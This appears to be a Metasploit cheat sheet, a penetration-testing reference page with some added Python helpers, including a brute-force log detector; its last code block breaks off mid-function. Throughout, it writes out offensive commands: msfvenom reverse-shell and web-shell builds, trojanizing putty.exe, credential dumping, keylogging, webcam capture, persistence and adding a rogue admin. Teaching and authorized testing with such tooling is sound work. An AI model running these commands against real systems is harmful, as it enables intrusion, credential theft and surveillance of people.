Metasploit is the exploitation framework everyone knows and half the people actually understand. This cheat sheet covers everything from first-time msfconsole navigation to post-exploitation pivoting — organized by how you actually use it on an engagement, not alphabetically by command.

Updated for 2026. Bookmark it.


Starting Metasploit

# Start msfconsole
msfconsole

# Start with quiet mode (skip banner)
msfconsole -q

# Start with a resource script
msfconsole -r setup.rc

# Start with a specific database
msfconsole -y /path/to/database.yml

# Update Metasploit
msfupdate

Database Setup

Metasploit’s database stores hosts, services, credentials, and loot. Worth setting up.

# Start PostgreSQL
sudo service postgresql start
# or
sudo systemctl start postgresql

# Initialize the database
msfdb init

# Check DB status
msf> db_status

# Connect to existing DB
msf> db_connect postgres:<password>@<host>/msf    # user:password@host/database

# Disconnect
msf> db_disconnect

# Rebuild the cache
msf> db_rebuild_cache

Core msfconsole Commands

# Help
msf> help
msf> ?

# Search modules
msf> search type:exploit name:eternalblue
msf> search cve:2021-44228
msf> search platform:windows type:exploit rank:excellent
msf> search ms17-010

# Use a module
msf> use exploit/windows/smb/ms17_010_eternalblue
msf> use 0    # use by search result number

# Show module info
msf> info
msf> info exploit/windows/smb/ms17_010_eternalblue

# Go back
msf> back

# Previous module
msf> previous

# Show all loaded modules
msf> show exploits
msf> show auxiliary
msf> show post
msf> show payloads
msf> show encoders
msf> show nops
msf> show evasion

Options

# Show options for current module
msf> show options
msf> show advanced    # advanced options
msf> show missing     # required options not yet set

# Set options
msf> set RHOSTS 192.168.1.1
msf> set RPORT 445
msf> set LHOST 192.168.1.100
msf> set LPORT 4444

# Set multiple targets
msf> set RHOSTS 192.168.1.1-254
msf> set RHOSTS 192.168.1.0/24
msf> set RHOSTS file:/tmp/targets.txt

# Unset an option
msf> unset RHOSTS

# Set global options (persist across modules)
msf> setg LHOST 192.168.1.100
msf> setg LPORT 4444

# Unset global option
msf> unsetg LHOST

# Save settings to file
msf> save

Targets and Payloads

# Show compatible targets
msf> show targets
msf> set TARGET 1

# Show compatible payloads for current exploit
msf> show payloads

# Set payload
msf> set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf> set PAYLOAD linux/x64/meterpreter/reverse_tcp
msf> set PAYLOAD generic/shell_reverse_tcp

# Check if module/target/payload combo is viable
msf> check

Running Modules

# Run/exploit
msf> run
msf> exploit

# Run in background (non-interactive)
msf> run -j
msf> exploit -j

# Run with a specific NOP generator (-n takes a generator name)
msf> exploit -n x86/single_byte

# Run as a job and do not interact with the session it creates
msf> exploit -j -z

Payloads

Payload Types

Type         Description
singles      Self-contained, no stager needed
stagers      Small payload that fetches the stage
stages       The full payload delivered by a stager
meterpreter  Advanced in-memory shell, extensible
shell        Basic command shell

Common Payload Names

# Windows reverse shells
windows/x64/meterpreter/reverse_tcp
windows/x64/meterpreter/reverse_https
windows/x64/meterpreter_reverse_tcp    # stageless
windows/x64/shell_reverse_tcp
windows/x64/powershell_reverse_tcp

# Windows bind shells
windows/x64/meterpreter/bind_tcp

# Linux reverse shells
linux/x64/meterpreter/reverse_tcp
linux/x64/meterpreter_reverse_tcp      # stageless
linux/x64/shell_reverse_tcp

# macOS
osx/x64/meterpreter_reverse_tcp
osx/x64/shell_reverse_tcp

# Web payloads
php/meterpreter/reverse_tcp
java/meterpreter/reverse_tcp
python/meterpreter/reverse_tcp

Staged vs Stageless: Staged payloads (a slash between type and transport, e.g. meterpreter/reverse_tcp) send a small first stage that pulls the full payload. Stageless payloads (an underscore, e.g. meterpreter_reverse_tcp) ship everything in one. Use stageless when you can’t make a second outbound connection (locked-down networks). Use staged when file size matters.
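
The staged/stageless distinction is encoded in the name itself, so it can be checked mechanically before a batch of msfvenom builds or when triaging a sample whose payload name is known. The parser below is an added example written for this cheat sheet; it is not code from the page or from the Metasploit project. The lists of architectures and payload types it recognises are assumptions drawn from the names above, not the framework's own tables.

```python
"""Classify Metasploit payload names by platform, arch, type, transport and staging.

Added example for this cheat sheet; not code from the page or from Metasploit.
The rules are assumptions drawn from the naming convention shown above: a '/'
between payload type and transport (meterpreter/reverse_tcp) marks a staged
payload, an '_' (meterpreter_reverse_tcp) marks a stageless one.
"""
from dataclasses import dataclass
from typing import List, Optional

# Second path component that names an architecture rather than a payload type (assumed list).
ARCHES = {"x64", "x86", "aarch64", "armle", "armbe", "mipsle", "mipsbe", "ppc"}
# Payload types the sheet lists plus a few common ones (assumed list, not exhaustive).
TYPES = ("meterpreter", "powershell", "shell", "exec")


@dataclass(frozen=True)
class PayloadInfo:
    platform: str
    arch: Optional[str]   # None when the name carries no arch (for windows/ that is the 32-bit build)
    kind: str             # meterpreter, shell, powershell, cmd ...
    transport: str        # reverse_tcp, bind_tcp, reverse_https ...
    staged: bool          # True = stager + stage, False = single/stageless


def parse_payload(name: str) -> PayloadInfo:
    parts = name.strip().split("/")
    if len(parts) < 2:
        raise ValueError(f"not a Metasploit payload name: {name!r}")
    platform = parts[0]
    rest = parts[1:]
    # cmd/unix/reverse_bash etc.: the sub-platform belongs to the platform, it is not an arch.
    if platform == "cmd" and len(rest) >= 2:
        platform = f"cmd/{rest[0]}"
        rest = rest[1:]
    arch = rest.pop(0) if rest and rest[0] in ARCHES else None
    if len(rest) == 2:
        kind, transport = rest           # type/transport -> staged
        return PayloadInfo(platform, arch, kind, transport, staged=True)
    if len(rest) == 1:
        token = rest[0]                  # type_transport -> stageless or single
        for kind in TYPES:
            if token.startswith(kind + "_"):
                return PayloadInfo(platform, arch, kind, token[len(kind) + 1:], staged=False)
        if platform.startswith("cmd/"):  # command-interpreter singles carry no type prefix
            return PayloadInfo(platform, arch, "cmd", token, staged=False)
    raise ValueError(f"unrecognised payload layout: {name!r}")


def needs_stage_download(name: str) -> bool:
    """True when the first stage has to pull the rest of the payload over the transport."""
    return parse_payload(name).staged


def summarize(names: List[str]) -> List[str]:
    """One line per payload, handy for reviewing a list of builds before running msfvenom."""
    out = []
    for n in names:
        p = parse_payload(n)
        out.append(f"{n}: {p.platform} {p.arch or '-'} {p.kind} via {p.transport} "
                   f"({'staged' if p.staged else 'stageless'})")
    return out


if __name__ == "__main__":
    for line in summarize(["windows/x64/meterpreter/reverse_tcp",
                           "windows/x64/meterpreter_reverse_tcp",
                           "cmd/unix/reverse_bash"]):
        print(line)
```

Names with no architecture component (windows/meterpreter/reverse_tcp) come back with arch None; on Windows that is the 32-bit build, which is why the shikata_ga_nai example further down pairs such a name with an x86 encoder.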


msfvenom — Payload Generation

msfvenom generates standalone payloads outside of msfconsole.

Basic Usage

msfvenom -p <payload> LHOST=<ip> LPORT=<port> -f <format> -o <output>

Common Formats

# Windows executable
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe -o payload.exe

# Windows DLL
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f dll -o payload.dll

# PowerShell
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f psh -o payload.ps1

# Linux ELF
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f elf -o payload.elf

# Python
msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f raw -o payload.py

# PHP webshell
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f raw -o shell.php

# ASP/ASPX
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f asp -o shell.asp
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f aspx -o shell.aspx

# Java WAR
msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f war -o shell.war

# HTA (HTML Application)
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f hta-psh -o payload.hta

# Bash
msfvenom -p cmd/unix/reverse_bash LHOST=192.168.1.100 LPORT=4444 -f raw > shell.sh

Encoding and Evasion

# List encoders
msfvenom --list encoders

# Encode with shikata_ga_nai (x86 only)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -e x86/shikata_ga_nai -i 5 -f exe -o encoded.exe

# Stageless with encoding
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.1.100 LPORT=4444 -e x64/xor_dynamic -i 3 -f exe -o stageless.exe

# Add NOP sled
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -n 100 -f exe -o payload_nop.exe

# Bad character avoidance
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -b "\x00\x0a\x0d" -f exe -o nobadchars.exe

# Inject into existing executable
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -x /path/to/putty.exe -f exe -o trojanized.exe

# Keep original functionality
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -x /path/to/putty.exe -k -f exe -o trojanized_working.exe

Listing Options

# List all payloads
msfvenom --list payloads

# List payloads for a specific platform
msfvenom --list payloads | grep windows/x64

# List output formats
msfvenom --list formats

# Payload options
msfvenom -p windows/x64/meterpreter/reverse_tcp --list-options

Listeners — Catching Shells

msf> use exploit/multi/handler
msf> set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf> set LHOST 192.168.1.100
msf> set LPORT 4444
msf> set ExitOnSession false    # keep listening after first session
msf> run -j                      # run as background job

Resource Script for Handler

Save as handler.rc and load with msfconsole -r handler.rc:

use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.100
set LPORT 4444
set ExitOnSession false
run -j

Sessions

Managing Sessions

# List active sessions
msf> sessions
msf> sessions -l

# Interact with a session
msf> sessions -i 1

# Kill a session
msf> sessions -k 1
msf> sessions -k all

# Run a command on a session without interacting
msf> sessions -c "whoami" -i 1

# Run a module on a session
msf> sessions -s post/multi/manage/shell_to_meterpreter -i 1

# Upgrade a shell to Meterpreter
msf> sessions -u 1

# Background current session
meterpreter> background
# or
meterpreter> bg

Session Types

# Shell session to Meterpreter
msf> use post/multi/manage/shell_to_meterpreter
msf> set SESSION 1
msf> run

Meterpreter Commands

Core

# Help
meterpreter> help
meterpreter> ?

# Background session
meterpreter> background
meterpreter> bg

# Get current session info
meterpreter> sysinfo

# Current user
meterpreter> getuid

# Get PID
meterpreter> getpid

# Get environment variables
meterpreter> getenv PATH

# Exit/kill session
meterpreter> exit
meterpreter> quit

File System

# Print working directory
meterpreter> pwd

# List directory
meterpreter> ls
meterpreter> dir

# Change directory
meterpreter> cd C:\\Users\\target

# Read file
meterpreter> cat C:\\Users\\target\\Desktop\\secret.txt

# Upload file
meterpreter> upload /local/file.exe C:\\Windows\\Temp\\file.exe

# Download file
meterpreter> download C:\\Users\\target\\Desktop\\secret.txt /local/

# Delete file
meterpreter> rm C:\\Windows\\Temp\\file.exe

# Make directory
meterpreter> mkdir C:\\Windows\\Temp\\working

# Search for files
meterpreter> search -f *.txt -d C:\\Users
meterpreter> search -f password* -d C:\\
meterpreter> search -f *.kdbx

Process Management

# List processes
meterpreter> ps

# Kill process
meterpreter> kill 1234

# Migrate to another process
meterpreter> migrate 1234

# Migrate to explorer.exe (for stability)
meterpreter> migrate -N explorer.exe

# Execute a program
meterpreter> execute -f cmd.exe -i -H    # interactive, hidden
meterpreter> execute -f notepad.exe

# Get shell
meterpreter> shell

Privilege Escalation

# Check privileges
meterpreter> getprivs

# Get system (requires admin)
meterpreter> getsystem

# Show token impersonation options
meterpreter> load incognito
meterpreter> list_tokens -u
meterpreter> impersonate_token "NT AUTHORITY\\SYSTEM"

# UAC bypass (from msfconsole)
msf> use exploit/windows/local/bypassuac
msf> set SESSION 1
msf> run

Networking

# Network interfaces
meterpreter> ipconfig
meterpreter> ifconfig

# ARP table
meterpreter> arp

# Active connections
meterpreter> netstat

# DNS resolve
meterpreter> resolve google.com

# Port forward (local port -> remote host:port, through the session)
meterpreter> portfwd add -l 3389 -p 3389 -r 192.168.2.1
meterpreter> portfwd list
meterpreter> portfwd delete -l 3389

# Route through session (add subnet to routing table)
msf> route add 192.168.2.0/24 1    # 1 = session ID
msf> route print
msf> route remove 192.168.2.0/24 1

Credential Dumping

# Dump hashes (requires SYSTEM)
meterpreter> hashdump

# Run Mimikatz (kiwi module)
meterpreter> load kiwi
meterpreter> creds_all              # dump all credentials
meterpreter> lsa_dump_sam           # SAM database
meterpreter> lsa_dump_secrets       # LSA secrets
meterpreter> lsa_dump_cache         # cached domain credentials
meterpreter> kerberos_ticket_list   # list Kerberos tickets
meterpreter> kerberos_ticket_purge
meterpreter> golden_ticket_create   # create golden ticket
meterpreter> wifi_list              # saved WiFi passwords

# Via post module
msf> use post/windows/gather/hashdump
msf> set SESSION 1
msf> run

Screenshots and Keylogging

# Screenshot
meterpreter> screenshot

# Start keylogger
meterpreter> keyscan_start

# Dump keylogger buffer
meterpreter> keyscan_dump

# Stop keylogger
meterpreter> keyscan_stop

# Webcam snapshot
meterpreter> webcam_snap

# Webcam stream
meterpreter> webcam_stream

# Audio capture
meterpreter> record_mic -d 10    # 10 seconds

Persistence

# Registry autorun
msf> use post/windows/manage/persistence
msf> set SESSION 1
msf> set STARTUP REGISTRY
msf> run

# Scheduler task
msf> use post/windows/manage/persistence_exe
msf> set SESSION 1
msf> set STARTUP SCHEDULER
msf> run

# Via meterpreter (older method)
meterpreter> run persistence -h    # see options

Post-Exploitation Modules

Windows

# Local privilege escalation suggestions
msf> use post/multi/recon/local_exploit_suggester
msf> set SESSION 1
msf> run

# Dump credentials
msf> use post/windows/gather/credentials/credential_collector
msf> use post/windows/gather/smart_hashdump

# Enumerate applications
msf> use post/windows/gather/enum_applications
msf> set SESSION 1
msf> run

# Enumerate logged-on users
msf> use post/windows/gather/enum_logged_on_users

# Collect browser data
msf> use post/windows/gather/enum_chrome
msf> use post/windows/gather/enum_firefox

# Windows Defender status
msf> use post/windows/gather/av_bypass

# Enable RDP
msf> use post/windows/manage/enable_rdp
msf> set SESSION 1
msf> run

# Add admin user
msf> use post/windows/manage/add_user
msf> set SESSION 1
msf> set USERNAME hacker
msf> set PASSWORD Password123
msf> set GROUP Administrators
msf> run

Linux

# Local privilege escalation suggestions
msf> use post/multi/recon/local_exploit_suggester

# Dump hashes
msf> use post/linux/gather/hashdump
msf> use post/linux/gather/pptpd_chap_secrets

# Enum configs
msf> use post/linux/gather/enum_configs

# SSH key persistence
msf> use post/linux/manage/sshkey_persistence

Cross-Platform

# TCP/UDP scan through session (pivot recon)
msf> use post/multi/gather/ping_sweep
msf> use auxiliary/scanner/portscan/tcp
msf> set RHOSTS 192.168.2.0/24
msf> set SESSION 1
msf> run

Pivoting

Pivoting is for when you’ve compromised a box that can reach networks you can’t directly access.

Route-Based Pivoting

# Add route through session
msf> route add 192.168.2.0/24 1     # session 1
msf> route print

# Now modules targeting 192.168.2.x will pivot through session 1
msf> use auxiliary/scanner/smb/smb_ms17_010
msf> set RHOSTS 192.168.2.0/24
msf> run

# Auto-add routes from session
msf> use post/multi/manage/autoroute
msf> set SESSION 1
msf> set ACTION ADD
msf> run
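
What the route table actually decides is easy to get wrong once routes overlap, so here is a small model of it, added as an example and not code from the page or from Metasploit (the framework keeps its table in Rex::Socket::SwitchBoard, which is not reused here). It reproduces the behaviour described above: a target inside a routed subnet goes through that session, the most specific route wins, and anything else is reached directly. The subnets and session numbers are constructed sample values.

```python
"""A model of msfconsole's pivot routing table ('route add/print/remove').

Added example, not Metasploit's code. Subnets and session ids below are
constructed sample values; most-specific-route-wins is the modelled rule.
"""
import ipaddress
from typing import List, Optional, Tuple

Route = Tuple[ipaddress.IPv4Network, int]


class RouteTable:
    def __init__(self) -> None:
        self._routes: List[Route] = []

    def add(self, subnet: str, session: int) -> bool:
        """route add <subnet> <session>; False if that exact route already exists."""
        net = ipaddress.ip_network(subnet, strict=False)
        if (net, session) in self._routes:
            return False
        self._routes.append((net, session))
        return True

    def remove(self, subnet: str, session: int) -> bool:
        """route remove <subnet> <session>; False if there was no such route."""
        net = ipaddress.ip_network(subnet, strict=False)
        try:
            self._routes.remove((net, session))
            return True
        except ValueError:
            return False

    def print(self) -> List[str]:
        """route print: one 'subnet via session N' line per route, most specific first."""
        ordered = sorted(self._routes,
                         key=lambda r: (-r[0].prefixlen, int(r[0].network_address)))
        return [f"{net} via session {sess}" for net, sess in ordered]

    def session_for(self, target: str) -> Optional[int]:
        """Which session a module targeting `target` would pivot through (None = direct)."""
        addr = ipaddress.ip_address(target)
        best: Optional[Route] = None
        for net, sess in self._routes:
            # Longest prefix wins when several routes contain the address.
            if addr in net and (best is None or net.prefixlen > best[0].prefixlen):
                best = (net, sess)
        return best[1] if best else None


def plan_targets(table: RouteTable, targets: List[str]) -> dict:
    """Group a target list by the session it will be reached through (None = direct)."""
    plan: dict = {}
    for t in targets:
        plan.setdefault(table.session_for(t), []).append(t)
    return plan


if __name__ == "__main__":
    table = RouteTable()
    table.add("192.168.2.0/24", 1)        # route add 192.168.2.0/24 1
    table.add("192.168.2.128/25", 2)      # a second session closer to the upper half
    print("\n".join(table.print()))
    print(plan_targets(table, ["192.168.2.20", "192.168.2.200", "203.0.113.5"]))
```

Run plan_targets over the RHOSTS list before launching a scanner module: any target that maps to None will leave your own box directly, which is usually the opposite of what a pivot was set up for.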

SOCKS Proxy (for external tools)

# Start SOCKS proxy through session
msf> use auxiliary/server/socks_proxy
msf> set VERSION 5
msf> set SRVHOST 127.0.0.1
msf> set SRVPORT 1080
msf> run -j

# Then use proxychains for external tools
# Edit /etc/proxychains4.conf: socks5 127.0.0.1 1080

proxychains nmap -sT -Pn 192.168.2.1
proxychains crackmapexec smb 192.168.2.0/24

Port Forwarding

# Forward local port to remote host:port via session
meterpreter> portfwd add -l 8080 -p 80 -r 192.168.2.10

# Forward local port to remote host:port (reverse)
meterpreter> portfwd add -R -l 4444 -p 4444 -r 192.168.1.100

# Access internal RDP through pivot
meterpreter> portfwd add -l 3389 -p 3389 -r 192.168.2.10
# Now: xfreerdp /v:127.0.0.1:3389 /u:administrator

Auxiliary Modules

Scanners, brute forcers, fuzzers — no exploitation, just recon and testing.

Scanning

# Port scan
msf> use auxiliary/scanner/portscan/tcp
msf> set RHOSTS 192.168.1.0/24
msf> set PORTS 22,80,443,445,3389
msf> run

# SYN scan
msf> use auxiliary/scanner/portscan/syn

# SMB version
msf> use auxiliary/scanner/smb/smb_version
msf> set RHOSTS 192.168.1.0/24
msf> run

# EternalBlue check (no exploitation)
msf> use auxiliary/scanner/smb/smb_ms17_010

# SSH version
msf> use auxiliary/scanner/ssh/ssh_version

# FTP version
msf> use auxiliary/scanner/ftp/ftp_version

# HTTP title
msf> use auxiliary/scanner/http/title

# VNC auth check
msf> use auxiliary/scanner/vnc/vnc_none_auth

Brute Force

# SSH brute force
msf> use auxiliary/scanner/ssh/ssh_login
msf> set RHOSTS 192.168.1.1
msf> set USER_FILE /usr/share/wordlists/metasploit/unix_users.txt
msf> set PASS_FILE /usr/share/wordlists/rockyou.txt
msf> set STOP_ON_SUCCESS true
msf> run

# SMB brute force
msf> use auxiliary/scanner/smb/smb_login
msf> set RHOSTS 192.168.1.0/24
msf> set SMBUser administrator
msf> set PASS_FILE /usr/share/wordlists/rockyou.txt
msf> run

# FTP brute force
msf> use auxiliary/scanner/ftp/ftp_login

# HTTP form brute force
msf> use auxiliary/scanner/http/http_login
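
From the other side of the wire, ssh_login with a wordlist and STOP_ON_SUCCESS leaves a very recognisable footprint in sshd logs: a burst of failures from one source, often across several usernames, followed by one accepted login. The detector below is an added example, not code from the page or from Metasploit. Its log lines are constructed in the syslog format OpenSSH writes on Debian-style hosts, and the thresholds (5 failures inside 60 s, or a success after 3 or more failures from the same source) are assumptions to tune for your environment.

```python
"""Flag the footprint a password brute force like ssh_login leaves in sshd logs.

Added example, not from the page or from Metasploit. SAMPLE_LOG is constructed;
the thresholds are assumptions, not measured values.
"""
import re
from collections import defaultdict
from datetime import datetime
from typing import Dict, Iterable, List, Tuple

LINE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} +\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<event>Failed|Accepted) (?:password|publickey) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>\S+) port \d+"
)


def _ts(text: str) -> datetime:
    # Syslog timestamps carry no year; only differences between them are used here.
    return datetime.strptime(text, "%b %d %H:%M:%S")


def detect_brute_force(lines: Iterable[str], threshold: int = 5,
                       window_seconds: int = 60) -> Dict[str, dict]:
    """Per source IP: failure count, densest burst, users tried, and any success after failures."""
    events: Dict[str, List[Tuple[datetime, str, str]]] = defaultdict(list)
    for raw in lines:
        m = LINE.match(raw)
        if m:
            events[m["ip"]].append((_ts(m["ts"]), m["event"], m["user"]))

    report: Dict[str, dict] = {}
    for ip, evs in events.items():
        evs.sort(key=lambda e: e[0])
        fails = [e for e in evs if e[1] == "Failed"]
        # Largest number of failures inside any window_seconds-long span (two-pointer sweep).
        peak, j = 0, 0
        for i in range(len(fails)):
            while (fails[i][0] - fails[j][0]).total_seconds() > window_seconds:
                j += 1
            peak = max(peak, i - j + 1)
        # First successful login that comes after at least three failures from this IP.
        success_user, seen = None, 0
        for _, event, user in evs:
            if event == "Failed":
                seen += 1
            elif seen >= 3:
                success_user = user
                break
        if peak >= threshold or success_user:
            report[ip] = {
                "failures": len(fails),
                "peak_in_window": peak,
                "users": sorted({u for _, _, u in fails}),
                "success_after_failures": success_user,
            }
    return report


# Constructed sample log, not real traffic.
SAMPLE_LOG = """\
Jan 14 10:22:01 bastion sshd[4101]: Failed password for invalid user admin from 10.0.0.5 port 51234 ssh2
Jan 14 10:22:02 bastion sshd[4102]: Failed password for invalid user admin from 10.0.0.5 port 51236 ssh2
Jan 14 10:22:03 bastion sshd[4103]: Failed password for root from 10.0.0.5 port 51238 ssh2
Jan 14 10:22:04 bastion sshd[4104]: Failed password for root from 10.0.0.5 port 51240 ssh2
Jan 14 10:22:05 bastion sshd[4105]: Failed password for invalid user oracle from 10.0.0.5 port 51242 ssh2
Jan 14 10:22:06 bastion sshd[4106]: Failed password for root from 10.0.0.5 port 51244 ssh2
Jan 14 10:22:07 bastion sshd[4107]: Accepted password for root from 10.0.0.5 port 51246 ssh2
Jan 14 10:25:40 bastion sshd[4120]: Failed password for alice from 192.168.1.23 port 40022 ssh2
Jan 14 10:25:49 bastion sshd[4121]: Accepted publickey for alice from 192.168.1.23 port 40024 ssh2
Jan 14 11:03:12 bastion sshd[4133]: Failed password for invalid user test from 10.0.0.9 port 33001 ssh2
Jan 14 11:03:12 bastion sshd[4134]: Failed password for invalid user test from 10.0.0.9 port 33002 ssh2
"""

if __name__ == "__main__":
    for ip, summary in detect_brute_force(SAMPLE_LOG.splitlines()).items():
        print(ip, summary)
```

The one typo from 192.168.1.23 followed by a key login is not reported; 10.0.0.5 is, with the user that finally got in, which is the account to reset first. The same two signals (failure density per source, success after a run of failures) carry over to smb_login against Windows event 4625/4624 pairs.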

Exploitation

# EternalBlue (MS17-010)
msf> use exploit/windows/smb/ms17_010_eternalblue
msf> set RHOSTS 192.168.1.1
msf> set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf> set LHOST 192.168.1.100
msf> run

# BlueKeep (CVE-2019-0708)
msf> use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

# Log4Shell (CVE-2021-44228)
msf> use exploit/multi/http/log4shell_header_injection

# PrintNightmare (CVE-2021-1675)
msf> use exploit/windows/local/cve_2021_1675_printnightmare

# Zerologon (CVE-2020-1472)
msf> use exploit/windows/dcerpc/cve_2020_1472_zerologon

# MS08-067 (legacy, but lab staple)
msf> use exploit/windows/smb/ms08_067_netapi

Database Commands

# Show discovered hosts
msf> hosts
msf> hosts -R    # set RHOSTS to all discovered hosts

# Show discovered services
msf> services
msf> services -p 445    # filter by port
msf> services -S smb    # filter by service name

# Show credentials
msf> creds

# Show loot
msf> loot

# Import Nmap XML
msf> db_import /path/to/scan.xml

# Run Nmap and import directly
msf> db_nmap -sV -p- 192.168.1.1

# Export database
msf> db_export -f xml /tmp/msf_export.xml

# Workspace management
msf> workspace                  # list workspaces
msf> workspace -a engagement1   # create workspace
msf> workspace engagement1      # switch workspace
msf> workspace -d engagement1   # delete workspace
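
db_import is a parser plus a table; seeing the two written out makes the hosts/services filters above less magical. The code below is an added example, not Metasploit's importer. SAMPLE_NMAP_XML is a constructed, minimal Nmap -oX document, and the small NAME_MAP that turns Nmap's service names into the short names msfconsole shows (microsoft-ds to smb and so on) is an assumed subset of the framework's own, much larger, table.

```python
"""Parse Nmap XML into the hosts/services rows that db_import stores.

Added example, not Metasploit's importer. SAMPLE_NMAP_XML is constructed and
NAME_MAP is an assumed subset of the framework's service-name mapping.
"""
import ipaddress
import xml.etree.ElementTree as ET
from dataclasses import dataclass
from typing import List, Optional

# Nmap service name -> name msfconsole reports (assumed subset of the importer's map).
NAME_MAP = {"microsoft-ds": "smb", "netbios-ssn": "smb", "ms-wbt-server": "rdp",
            "ms-sql-s": "mssql", "domain": "dns"}


@dataclass(frozen=True)
class Service:
    host: str
    port: int
    proto: str
    state: str
    name: str
    info: str


def parse_nmap_xml(xml_text: str) -> List[Service]:
    """One Service row per scanned port on every host Nmap reported as up."""
    rows: List[Service] = []
    for host in ET.fromstring(xml_text).iter("host"):
        status = host.find("status")
        if status is None or status.get("state") != "up":
            continue                       # down hosts are not imported
        addr = next((a.get("addr") for a in host.findall("address")
                     if a.get("addrtype") == "ipv4"), None)
        ports = host.find("ports")
        if addr is None or ports is None:
            continue
        for p in ports.findall("port"):
            state = p.find("state")
            svc = p.find("service")
            raw_name, info = "", ""
            if svc is not None:
                raw_name = svc.get("name", "")
                info = " ".join(x for x in (svc.get("product"), svc.get("version")) if x)
            rows.append(Service(
                host=addr,
                port=int(p.get("portid")),
                proto=p.get("protocol", "tcp"),
                state=state.get("state", "unknown") if state is not None else "unknown",
                name=NAME_MAP.get(raw_name, raw_name),
                info=info,
            ))
    return rows


def hosts(rows: List[Service]) -> List[str]:
    """'hosts': distinct addresses, in address order."""
    return sorted({r.host for r in rows}, key=ipaddress.ip_address)


def services(rows: List[Service], port: Optional[int] = None,
             name: Optional[str] = None, state: Optional[str] = "open") -> List[Service]:
    """'services -p <port>' / 'services -S <name>'; open ports only unless state=None."""
    return [r for r in rows
            if (port is None or r.port == port)
            and (name is None or r.name == name)
            and (state is None or r.state == state)]


def rhosts_from_hosts(rows: List[Service]) -> str:
    """What 'hosts -R' puts into RHOSTS: every discovered host, space separated."""
    return " ".join(hosts(rows))


# Constructed sample scan output (not a real scan).
SAMPLE_NMAP_XML = """\
<nmaprun scanner="nmap" args="nmap -sV -oX - 192.168.1.0/24">
  <host><status state="up"/><address addr="192.168.1.10" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="445"><state state="open"/><service name="microsoft-ds" product="Windows 7 - 10 microsoft-ds"/></port>
      <port protocol="tcp" portid="3389"><state state="open"/><service name="ms-wbt-server"/></port>
    </ports></host>
  <host><status state="up"/><address addr="192.168.1.20" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22"><state state="open"/><service name="ssh" product="OpenSSH" version="8.9p1"/></port>
      <port protocol="tcp" portid="445"><state state="closed"/></port>
    </ports></host>
  <host><status state="down"/><address addr="192.168.1.30" addrtype="ipv4"/></host>
</nmaprun>
"""

if __name__ == "__main__":
    rows = parse_nmap_xml(SAMPLE_NMAP_XML)
    print("RHOSTS =", rhosts_from_hosts(rows))
    for s in services(rows, name="smb"):
        print(s)
```

Closed ports are kept in the rows (as the real database keeps them) but hidden by the default state filter, so services -p 445 lists only the host where SMB is actually reachable.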

Resource Scripts

Automate repetitive setup with .rc files.

# Run on start
msfconsole -r /path/to/script.rc

# Run from within msfconsole
msf> resource /path/to/script.rc

# Save the commands entered so far as a resource script
msf> makerc /tmp/session.rc

# Log all console output to a file
msf> spool /tmp/session.log    # start logging
msf> spool off                 # stop logging

Example auto_handler.rc:

use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.100
set LPORT 4444
set ExitOnSession false
set EnableStageEncoding true
exploit -j -z
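
A resource script fails at the worst moment, after you have already sent the payload, so it is worth linting before loading it with -r. The checker below is an added example, not code from the page or from Metasploit. It covers what handler.rc (in the Listeners section) and auto_handler.rc above rely on: a module is selected before run/exploit, a multi/handler has PAYLOAD, LHOST and LPORT (via set or setg), and ExitOnSession false is paired with a backgrounded (-j) run. The required-option table and the rule set are assumptions for this linter, not framework rules.

```python
"""Lint an msfconsole resource (.rc) script before loading it with -r.

Added example, not part of the page or of Metasploit. REQUIRED_FOR_HANDLER
and the rules below are assumptions for this check, not framework rules.
"""
import shlex
from typing import Dict, List

# Options a handler cannot usefully start without (assumed minimal set).
REQUIRED_FOR_HANDLER = ("PAYLOAD", "LHOST", "LPORT")


def lint_rc(text: str) -> List[str]:
    """Return a list of findings; an empty list means the script passed every check."""
    findings: List[str] = []
    module = None
    local: Dict[str, str] = {}    # 'set' options, reset on every 'use'
    glob: Dict[str, str] = {}     # 'setg' options persist across modules
    in_ruby = False
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line == "<ruby>":
            in_ruby = True
            continue
        if line == "</ruby>":
            in_ruby = False
            continue
        if in_ruby:
            continue                    # embedded Ruby blocks are not inspected
        try:
            argv = shlex.split(line, comments=True)
        except ValueError:
            findings.append(f"line {lineno}: unbalanced quotes")
            continue
        if not argv:
            continue
        cmd, args = argv[0].lower(), argv[1:]
        if cmd == "use":
            module, local = (args[0] if args else None), {}
            if module is None:
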